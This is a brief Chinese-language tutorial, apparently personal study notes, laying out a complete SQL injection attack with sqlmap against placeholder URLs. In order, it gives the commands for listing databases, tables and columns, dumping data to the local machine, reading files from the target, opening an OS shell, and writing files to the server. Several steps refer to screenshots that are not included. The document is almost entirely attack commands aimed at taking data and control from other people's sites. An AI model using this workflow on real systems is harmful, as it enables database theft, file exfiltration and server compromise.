完整的sql注入流程（sqlmap）

一、先判断网站的数据库

--dbs(重点）

sqlmap.py -u http://XXXXX --dbs

确定网站数据库，默认显示所有数据库

--current-db 查看当前连接数据库名（重点）

sqlmap.py -u http:\\192.......... -current-db

二、知道数据库里面的表

--tables把所有的表列出来

这样是不行的，一般是当前注入库里面的表，--tables -D

字段     --columns -T 表名 -D 数据库

--columns -T 表名 -D 数据库名

-T表名 -c字段 --dump（把数据库下载到本地）

找到sqlmap路径  去dump文件里找到刚才保存的数据库记录

远程读取文件内容  --file-read

例：在虚拟机C盘目录下创建123.txt文件

可以直接保存到本机

sqlmap.py -u http：//xxxxx --file -read 文件位置

会把别人文件内容读取保存到本机

系统交互的shell

--os-shell

下面显示支持ASP  ASPX  JSP  PHP四门脚本语言

按4回车

这个URL不行

、

换一个aspx注入点试试

还是不行 过

远程上传文件  --file-write

物理路径是刚才--os-shell探测出来的，下面有截图（full是完整路径）